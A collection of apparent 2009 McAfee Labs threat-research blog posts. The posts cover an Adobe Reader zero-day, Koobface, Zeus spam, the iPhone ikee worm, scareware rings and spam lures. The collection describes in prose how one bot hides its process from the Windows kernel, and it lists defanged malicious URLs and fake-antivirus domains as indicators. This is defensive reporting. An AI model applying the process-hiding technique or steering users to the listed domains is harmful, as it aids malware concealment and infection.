Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

• Update your systems to current patch levels
• Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0″ threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module was added to the MetaSploit framework, as well; so it’s only a matter of days until this exploit will become widespread–as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee customers are protected through both the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (”BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment to this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.

Much malware comes with a kernel rootkit component. Subverting the Windows kernel is indeed the best way to conceal malicious activities on infected systems. To achieve this, many types of malware load malicious device drivers that enjoy full access to all kernel objects. However, this technique is somewhat noisy, and loading a new driver is not really stealthy.

At McAfee Labs we recently ran across a W32/IRCBot.gen.ac sample that uses Direct Kernel Object Manipulation (DKOM) to hide itself without loading a new driver. This technique seems impossible at first sight because modifying kernel memory pages from userland is not allowed. However, W32/IRCBot.gen.ac takes advantage of an undocumented function exported by ntdll.dll that provides debugging functionalities at the kernel level.

NtSystemDebugControl(), despite being undocumented, has been known for many years. It provides simple functions such as reading from and writing to any location within the kernel memory. And this is exactly what a piece of malware needs to manipulate kernel objects.

W32/IRCBot.gen.ac starts by checking what version of Windows it’s running on. This technique won’t work under Windows Vista or Windows 7. If the infected machine is not running Windows XP, W32/IRCBot.gen.ac gives up and doesn’t try to hide itself.

If it does find Windows XP, W32/IRCBot.gen.ac opens the current process’ token to ensure it has the SeDebugPrivilege, which is required to call NtSystemDebugControl().

To find the process list in the kernel memory, W32/IRCBot.gen.ac retrieves the address of the global variable PsInitialSystemProcess, which points to the EPROCESS structure of the system process.

W32/IRCBot.gen.ac can now find the process list in memory and go through it to find its own process. It then removes itself from the process list by calling NtSystemDebugControl() to write to kernel memory.

The malicious process is no longer visible in the Windows Task Manager or other tools such as Process Explorer. However, monitoring TCP connections will quickly reveal the presence of an offending process whose name can’t be found.

Rootkit Detective also detects processes hidden via DKOM.

Accessing kernel memory from userland is really bad, but it appears this hole has been plugged in later versions of Windows. Using this method of calling NtSystemDebugControl() to access kernel memory is not trivial, and we don’t expect this technique to be used widely. And this is a good thing because according to Artemis, Windows XP is still the most widely deployed operating system in corporate environments. My colleagues Igor Muttik and Dmitry Gryaznov, and Joel Yonts of Advanced Auto Parts demonstrated this during McAfee’s Focus 09 conference.

Nevertheless, I offer another reminder that the bad guys never hesitate to exploit any feature, whether documented or not, as long as they can gain control over innocent machines.

Log into privileged user accounts only when required, and keep your anti-virus software up to date!

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

• “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
• This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
• One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
• January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system.  Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a url that points to a website which urges the victim to download a vaccination profile archive:

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicate that most of them were registered with a Belgium registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. We even see some of the dns servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate the possibility that some the dns servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses associated with the websites hosting the Trojan, which stem from all over the world and appear to be dsl accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that the cyber criminals can take advantage of.  Fears of not being able to pay the monthly mortgage, car payments, backed up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as the try to make ends meet.  Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up your sensitive information.  In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card!.  One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser.  Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site setup by cyber criminals to steal your personal information.  If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick the malware uses is it tries to break Captcha and then uses it to register for another Facebook account. The infected machine shows a Captcha window and then tries to deceive the user by showing the time out for shutdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the user’s machine is locked until the Captcha is entered successfully.

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):

The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):

This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To get rid of the locked machine, users can follow this process:

• Press Ctrl+Alt+Del
• Go to Task Manager
• Then select Processes
• In Processes search for RUNDLL32.exe

• End that process

• Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes that are running the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

What would you do if you saw an email in your inbox with a PDF named “U.S. ship thwarts second pirate attack November 18, 2009.pdf”? Would the title pique your curiosity? I hope not enough for you open the document!

This PDF is the latest in the ugly line of exploit- and malware-ridden embedded PDFs that damage your computer. If you were unfortunate enough to open the file, you’d see what the malware writers expect you to see: a file named “Adobe.pdf” with details on a real story about piracy off the coast of East Africa.

But behind the scenes, sinister things occur. The malicious PDF runs some JavaScript that exploits the Adobe Collab overflow (CVE-2007-5659) and Adobe getIcon (CVE-2009-0927) vulnerabilities. This screenshot shows the beginning of the compressed JavaScript stream:

In addition, two variants of ProcKill-EM are dropped into the Windows system folder, usually C:\Windows\system32.

As always, if you receive a document–PDF or otherwise–from someone you don’t know, don’t open  it. And even if you know the document’s sender, scan the file with your anti-virus program with the latest signatures before you open it.

McAfee customers are protected in the 5809 DATs against the threats mentioned above, as Exploit-PDF.aa and ProcKill-EM. Keep your signatures up to date and stay secure!

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a feature in Java to social-engineer not tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

• The bad guys spam a link claiming to be the Carrie PreJean video
• Then they trick victims into visiting a malicious website, which prompts users into running a Java applet to view the video

The signed applet contains a signature that browsers should verify through a remote, independent certificate-authority server. Once the signature is verified and the user also approves, the signed applet can gain more rights, becoming equivalent to an ordinary application. When the app is injected into a trusted website, users would hardly take the trouble to validate if the certificate is legitimate.

• At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

This approach is very effective for the following reasons:

• It’s easier to social-engineer users, as many rich multimedia applications use Java
• Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
• The attack is independent of browser type and version
• The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on Virustotal, but it is detected by McAfee with the current DATS as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality that is capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

Nearly two years ago the first attempt at creating iPhone malware was seen.  That was an attack against jailbroken iPhones.  This month, although the shenanigans are still targeting jailbroken iPhones, things got a bit more complicated.

Last week saw someone in the Netherlands attempting to extort iPhone owners.  The attacker scanned his mobile phone carrier’s network looking for jailbroken iPhones. Once he located a phone running the secure shell service(SSH) he attempted to login using the default root user account password.  instead of quietly taking a look at or copying the user’s SMS messages and emails,  he decided to be a nice guy and replace their wallpaper with a demand for €5(approximately $7) in order to secure their iPhone.  His PayPal account was shut down and he quickly put up instructions for changing the password on his site.

Then this very week also saw the release of a worm by an Australian malware author using the handle ‘ikee’.  It exploits the same root password vulnerability as that used by the Netherlands attacker.  The worm family is now called OSX/RRoll.  It’s notable for replacing your wallpaper with an image of Rick Astley and a message from the author.  After changing the background image, OSX/RRoll.A-B will delete the binary of the SSH daemon(service) and terminate its process.  This serves the dual purpose of closing the hole that allowed infection and also preventing reinfection by the worm or other attackers.

Background image displayed while the iPhone is locked. (Simulated)

Background image displayed during a phone call. (Simulated)

Potential Legal Issues

The malware author gave an interview earlier in the week where he explains that there are four variants in the wild.  While he was willing to share the source code with his interviewer he expressed concern with its public release:

[10:13] <ikee> [...](I don’t know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)

Fortunately the interviewer shortly removed public access to the Google Code project.

The concern by ikee is certainly good to see and shows that perhaps he views malware creation as a bad idea.  What is odd, is that he doesn’t think he will run into any trouble with the authorities.  Unlike our friend from the Netherlands.

From ikee’s interview:

[09:39] <JD> Are you aware of the possible legal consequences of this (the [OSX/RRoll worm])? Are you concerned?
[09:40] <ikee> I’d like to think I’m aware, and also I highly doubt I’m in any real trouble (So no not concerned)

It seems Australia actually has a number of laws concerning High Tech Crime and ikee may eventually have a conversation with the Australian Federal Police. But who knows as I am not a lawyer.

Prevention

OSX/RRoll.A-B only targets jailbroken iPhones that run on the networks of three mobile carriers in Australia.  If you’ve installed the SSH service on your iPhone but neglected to change your root password from the well known default, you’re likely to be at risk from attackers.

Users can reduce their risk by:

• Changing the default root password.
• Not installing/uninstalling the SSH package if you don’t use it.
• Modifying your phone’s firmware can sometimes result in having software installed by default or with default settings.

Future threats

The source code for both versions of OSX/RRoll was available from a Google Code project for a little while earlier this week.  Once you have working source code for a worm, it can be straightforward to add more malicious actions.

As with the first attempt at iPhone malware which exploited an installer application for jailbroken iPhones, OSX/RRoll.B  exploits the Cydia Installer application.  Where previously the Installer application dealt only in free applications developed with the unofficial iPhone SDK, the Cydia application also provides the ability to buy applications through a Cydia Store. With the possibility of making money(application sales) and possibly lax security(unchanged default root passwords) attackers may see an opportunity in targeting  applications like Cydia.

Today, Microsoft’s Security Intelligence Report is out, and it’s no surprise that it’s littered with fake AV/security product threats–four out of the top five threats in the United States, no less. Let me show you that with a keen eye and our threat intelligence databases, the same group are responsible for a diverse set of criminal activity online, all at the same time.

I’m a little pedantic about the Queen’s English from time to time, and like most people I also make mistakes. However, this little spelling error caught my eye and a quick Google proves it’s gone unnoticed by the owners for quite a while, too.

I was doing a little research into some DSL IPs being abused at the moment and spotted the misspelling acess in this broken English phrase taken from the terms of service of a fake AV website:

“If acess services is unavailable during the subscription period, the member has the right for a refund of subscription fee.”

Google-dorking it with quotes so we get the exact phrase [link] reveals 141 sites that Google knows of. Misspelling access is hardly a crime, but copying the whole phrase is a little odd, isn’t it?

Take a look at the terms and conditions page of advanced-virus-remover2009 .com. (Visiting this site is bad for your health.)

And also the customer service page of this extreme porn site (incest-related domain redacted for obvious reasons):

These are sites that announce new content frequently, but the 18 U.S.C. 2257 record-keeping statements say that the content is ineligible–as it was created prior to July 3, 1995. Aand they don’t ask for your date of birth when you sign up, either. (The signs are always there!)

…and one of the promotional affiliate networks for a network of porn sites:

…and the world-renowned Data Backuper software from databackuper .com

These are old sites, so let’s be realistic here: It’s just a template. The bad guys are just lazy (or efficient, depending on your point of view) when it comes to their websites. As proof, if more were needed, advanced-virus-remover-2010 .com registered a day or two ago and is exactly the same.

(Old techniques die hard, eh? )

The same group(s) are undoubtedly connected with the recent tsunami spam that’s spreading more fake-alert malware–given the domain overlap below with this detailed VIL’s hosts-file infection data: http://vil.nai.com/vil/content/v_162829.htm

Lastly let’s take a look at their most recent flurry of fake-AV/codec/crypto&porn domains.
(Again, don’t visit; just read.)

0-vs-codec-pro .com
10-open-davinci .com
1-open-davinci .com
1-vs-codec-pro .com
2-open-davinci .com
2-vs-codec-pro .com
3-open-davinci .com
3-vs-codec-pro .com
5-open-davinci .com
6-open-davinci .com
advanced-virus-remover-2009 .com
advanced-virus-remover2009 .com
advanced-virusremover-2009 .com
advanced-virusremover2009 .com
advancedvirus-remover-2009 .com
advancedvirus-remover2009 .com
advancedvirusremover-2009 .com
advanced-virus-remover-2010 .com
advanced-virus-remover2010 .com
anti-virus-xp-pro2009 .com
bastaproject .com
best-scan .com
best-scan .net
best-scan-pc .com
best-scanpc .com
best-scan-pc .net
best-scanpc .net
best-scan-pc .org
best-scanpc .org
bestvsprog .net
coolcodec .net
coolcount1 .com
coolprojectnew .com
downloadavr3 .com
downloadavr4 .com
downloadavr5 .com
downloadavr6 .com
downloadavr7 .com
downloadavr8 .com
greatcrypt .com
hard-xxx-tube .com
maindavinchi .com
mainvscodec .net
megacryptnew .com
onlinescanxppro .com
open-davinci .net
rims-shop .com
testavrdown .com
testavrdownnew .com
trucount3005 .com
trucountme .com
vscodec-pro .net
vsproject .net
xxx-white-tube .net
xxx-white-tube .org

Quite a diverse set, eh? The pornographic content is managed somewhat separately, and I really don’t want to make extra work for our legal team with this one!

I doubt that’s all we’ll see this week. Passive DNS monitoring also shows that many of these are unused so far.

There will be more on this one, I’m sure.

Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us about Halloween-themed threats.

In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

Watch out for this and other malware during Halloween season, and keep your security products updated.

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Here’s another:

And our favorite with a holiday spin:

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Keep your security updated and search safely this week!

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how those malwares usually spread:

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app will exit. But, in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

and

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The dropbox on the login name doesn’t work
4) The status drop box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

In her recent blog Joanna Rutkowska describes a proof-of-concept code to attack Truecrypt system disk encryption. The blog also mentions “the concept behind the Evil Maid Attack is neither new, nor l33t in any way.” However, because the POC is now published, we expect script kiddies to jump on this opportunity and tweak this code to their advantage.

As always, to protect our customers we looked into a possible AV detection mechanism to alert users in case the system is compromised. Obviously an AV cannot prevent an Evil Maid attack, but alerting a user on the first reboot after such an infection can go a long way in preventing data loss.

We now detect this proof-of-concept code as Trojan PWS-EvilMaid!demo, due to its password-stealing capabilities. We will watch for any future variants that follow this trend. Here is the screenshot of McAfee alerting the user once the machine is infected. We recommend you reinstall Truecrypt if you see this detection.

Protect what you value!

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Little boy trapped in balloon
Balloon boy died
balloon kid’s full story
Boy-balloon-madness
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, United States, and Argentina and complete with customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million dollars (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

He discussed CarderPlanet, and its hierarchical structure set up like a mafia (and the source for the following image: NICSA-FBI-SSA, Michael J. McKeown )

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
• In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of the Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identify theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing urls, abusing social networking sites, and many other techniques for spam to avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to only nonword characters. It can be numbers, alphabets, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

This spam campaign calls into question whether Obama deserved to win the prize and that the country is suffering significant fallout as a result. The email then requests that users click or copy/paste a link into their browsers that will direct them to a website where they can download more information.

If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember users believe that they are going to be downloading a report on the unrest created by Obama’s acceptance of the award.

Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

Decoding this JavaScript reveals that this page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identifiy this Trojan as Generic PWS.y!hv.i.

This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over, but it continues to work due to its obvious successes. Even if you think you are going to outwit the malware authors by visiting their website but not download files, the page could be executing JavaScript in the background. Those scripts open other pages/sites via invisible iframes and test your machine for zero-day vulnerabilities and exploit them.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

